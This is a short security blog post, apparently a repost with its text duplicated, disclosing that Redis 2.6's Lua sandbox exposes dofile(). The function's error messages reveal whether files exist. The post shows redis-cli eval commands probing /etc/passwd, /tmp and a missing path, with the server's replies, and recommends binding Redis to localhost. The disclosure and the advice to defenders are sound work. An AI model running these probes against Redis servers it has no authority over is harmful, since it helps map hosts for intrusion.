Filesystem Enumeration using Redis and Lua
2013-06-18 21:47
661 查看
Redis 2.6 was recently released by Antirez at the end of RedisConf.
One of the major features that comes with 2.6 is embedded Lua scripting.
Even though the Lua sandbox within Redis has been very locked down to only the base library and a few others, we have found at least one way to abuse Lua to get some data from outside
the sandbox.
There is a function to load and execute a file called dofile()
Given the fact that Lua scripts should perform atomically, this function shouldn’t actually exist in the sandbox. We have a pending pull request to remove this function.
The errors this function gives allow an attacker to determine if a file or directory exists or not. This might be useful in locating a web root or determining the operating system. Not a significant vulnerability in and of itself, but gives information to an
attacker they would not otherwise have.
When a file doesn’t exist we get a very obvious “No such file or directory error”
net read 127.0.0.1:6379 id 1: -ERR Error running script (call to f_b5e5869caf1de9ffa1ae173bf46fef3024d3f987): cannot open /dev/a:No such file or directory
Here is an example of how to do this enumeration from a shell.
(error) ERR Error running script (call to f_afdc51b5f9e34eced5fae459fc1d856af181aaf1): /etc/passwd:2: unexpected symbol near ‘#’
(error) ERR Error running script (call to f_70391feea8a62e239b3055c11b7d9d1d8c78db6e): cannot read /tmp:Is a directory
(error) ERR Error running script (call to f_e84ccf03dc6b3547568096467afa7b3242ed108d): cannot open /doesnotexist: No such file or directory
Conclusion for penetration testers:
Keep an eye out for Redis servers on the network during your assessments
Conclusion for everyone else:
Keep your Redis server off the Internet by setting “bind 127.0.0.1” in the redis.conf file.
One of the major features that comes with 2.6 is embedded Lua scripting.
Even though the Lua sandbox within Redis has been very locked down to only the base library and a few others, we have found at least one way to abuse Lua to get some data from outside
the sandbox.
There is a function to load and execute a file called dofile()
Given the fact that Lua scripts should perform atomically, this function shouldn’t actually exist in the sandbox. We have a pending pull request to remove this function.
The errors this function gives allow an attacker to determine if a file or directory exists or not. This might be useful in locating a web root or determining the operating system. Not a significant vulnerability in and of itself, but gives information to an
attacker they would not otherwise have.
When a file doesn’t exist we get a very obvious “No such file or directory error”
net read 127.0.0.1:6379 id 1: -ERR Error running script (call to f_b5e5869caf1de9ffa1ae173bf46fef3024d3f987): cannot open /dev/a:No such file or directory
Here is an example of how to do this enumeration from a shell.
$ redis-cli -h localhost -p 6379 eval "dofile('/etc/passwd')" 0
(error) ERR Error running script (call to f_afdc51b5f9e34eced5fae459fc1d856af181aaf1): /etc/passwd:2: unexpected symbol near ‘#’
$ redis-cli -h localhost -p 6379 eval "dofile('/tmp')" 0
(error) ERR Error running script (call to f_70391feea8a62e239b3055c11b7d9d1d8c78db6e): cannot read /tmp:Is a directory
$ redis-cli -h localhost -p 6379 eval "dofile('/doesnotexist')" 0
(error) ERR Error running script (call to f_e84ccf03dc6b3547568096467afa7b3242ed108d): cannot open /doesnotexist: No such file or directory
Conclusion for penetration testers:
Keep an eye out for Redis servers on the network during your assessments
Conclusion for everyone else:
Keep your Redis server off the Internet by setting “bind 127.0.0.1” in the redis.conf file.
相关文章推荐
- Get and display the size of file and directory in Linux system using du command 获取和现实linux文件大小(三)
- BI Java 补丁错误处理 :Cannot login to the SAP J2EE Engine using user and password as provided in the Filesystem Secure Store. Enter va
- Mount a remote file system using sshfs and fuse - How to install sshfs
- Low-overhead enhancement of reliability of journaled file system using solid state storage and de-duplication
- Unix Sed Tutorial: Printing File Lines using Address and Patterns
- The Google File System : part1 ABSTRACT and INTRODUCTION
- capture screen activity to a movie file using AV Foundation on OS X 10.7 Lion and later
- [原创]HOW TO USE VERITAS VOLUME MANAGER AND VERITAS FILE SYSTEM
- Using __FILE__ and __LINE__ to Report Errors
- Count Arguments to a DOS Batch File without Using Your Fingers and Toes
- produce a gradient file using surface elevation data, and plot it using grdimage with topographic "shade"
- Difference between using bean id and name in Spring configuration file
- How to Setup NFS (Network File System) on RHEL/CentOS/Fedora and Debian/Ubuntu
- AsyncFileUpload File Type and File Size Validation using VB.NET
- Filesystem Formatting and Checking
- Read a File Using File Layout and insert data into a record
- Redis(7)Creating and Using Cluster Mode
- Generate a quick and easy custom pcap file using Python
- Unix Sed Tutorial: Delete File Lines Using Address and Patterns
- How to mount partition with ntfs file system and read write access